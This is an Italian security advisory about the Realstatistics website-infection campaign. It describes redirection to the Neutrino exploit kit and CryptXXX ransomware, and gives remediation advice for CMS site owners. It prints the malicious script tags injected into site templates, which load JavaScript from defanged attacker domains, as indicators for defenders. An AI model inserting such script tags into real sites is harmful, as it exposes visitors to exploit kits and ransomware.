Il nome dato a questa campagna deriva dai nomi dei domini utilizzati dagli attaccanti, che si ritrovano nel seguente codice JavaScript malevolo iniettato nei template PHP di tutti i siti infetti:

<script language="JavaScript" 
src="http://realstatistics[.]info[/]js/analytic.php?id=4"

<script language="JavaScript" 
src="http://realstatistics[.]pro[/]js/analytic.php?id=4"

Il primo indicatore di un sito compromesso da Realstatistics è stato osservato dagli analisti di Sucuri il 9 giugno scorso, data ipotetica del lancio di questa campagna. Nel periodo tra il 3 e il 5 luglio è stato rilevato un picco di infezioni, con almeno 2000 nuovi siti colpiti. Si stima che il numero reale di infezioni possa essere anche cinque volte maggiore. Google ha iniziato ad inserire i siti contenenti link al dominio “realstatistics[.]pro” nella lista dei siti bloccati (blacklist) a partire dal 3 luglio scorso.

Questa campagna di malware reindirizza i visitatori dei siti compromessi verso server contenenti l’exploit kit Neutrino EK che a sua volta sfrutta vulnerabilità note del browser dell’utente o dei plugin Flash e PDF Reader per installare il ransomware CryptXXX sul PCdella vittima.

I gestori di siti Web realizzati con piattaforme CMS devono verificare la presenza del codice di Realstatistics ed eventualmente rimuoverlo dal template infetto. Si raccomanda di mantenere aggiornate le piattaforme CMS utilizzate, nonché tutte le estensioni e iplugin installati, applicando le patch di sicurezza e gli aggiornamenti messi a disposizione dai rispettivi produttori.

Subscribe to our mailing list

* indicates required

(C) 2015 Monev Software LLC / JoomlaXTC.

Bakappa.it è una soluzione Pinet Internetworking http://www.pinet.it





Ns. dati contabili e fiscali: Pinet di Finesso Giancarlo - Via emilio Faa' di Bruno 69 - 15121 Alessandria - Tel 0131263767 - P.I. 01166420065 - CF FNSGCR52P02A182Y